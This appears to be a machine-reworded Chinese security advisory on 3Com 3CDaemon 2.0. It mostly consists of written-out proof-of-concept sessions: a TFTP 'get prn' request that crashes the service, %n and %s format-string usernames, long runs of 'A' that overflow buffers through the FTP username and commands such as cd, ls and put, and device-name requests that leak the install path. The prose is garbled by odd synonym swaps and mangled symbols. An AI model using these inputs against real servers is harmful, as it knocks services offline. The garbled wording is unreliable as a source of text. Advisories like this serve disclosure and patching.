无需我说了吧,3com的一款物品或是很知名很非常好滴~~~3CDaemon是一款完全免费的集成化了TFTP、FTP和SYSLOG作用的应用软件。
功效:FTP,TFTP,SYSLOG网络服务器,TFTP手机客户端
3CDaemon存有好几个安全隐患,远程控制网络攻击可以运用这种系统漏洞开展拒绝服务攻击、格式串及缓冲区溢出等进攻。
1、TFTP保存机器设备名拒绝服务攻击进攻:
递交相近如下所示的要求,可导致TFTP系统服务挂起来:
D:\WINDOWS\system32gt;tftp -i 192.168.0.1 get prn
The 3CDaemon will be crashed with some msgs like
"Microsoft Visual C Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".
2、FTP用户名存有格式串难题:
递交包括格式串标识符做为用户名数据信息,可导致守卫程序流程奔溃:
H:\gt;ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.
OR:
H:\gt;ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok, need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftpgt;
3、FTP较长用户名缓冲区溢出
因为对用户名缺乏恰当界限缓冲区域查验,递交较长用户名可导致缓冲区溢出:
D:\WINDOWS\system32gt;ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or missing parameters
Login failed.
ftpgt; user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.
4、好几个FTP指令较长主要参数缓冲区溢出:
cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP指令对主要参数缺乏充足界限查验,递交较长字符串数组做为指令主要参数可导致缓冲区溢出:
ftpgt; cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.
ftpgt;
ftpgt; ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.
ftpgt; put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.
5、好几个FTP指令存有格式串难题
递交格式字符串数组做为主要参数,可导致程序流程奔溃。
6、好几个FTP指令包机器设备名数据泄露难题
要求保存机器设备名可导致回到程序流程安装路径信息内容:
ftpgt; cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftpgt; cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!
受影响系统软件:
3Com 3CDaemon 2.0 revision 10
展开内容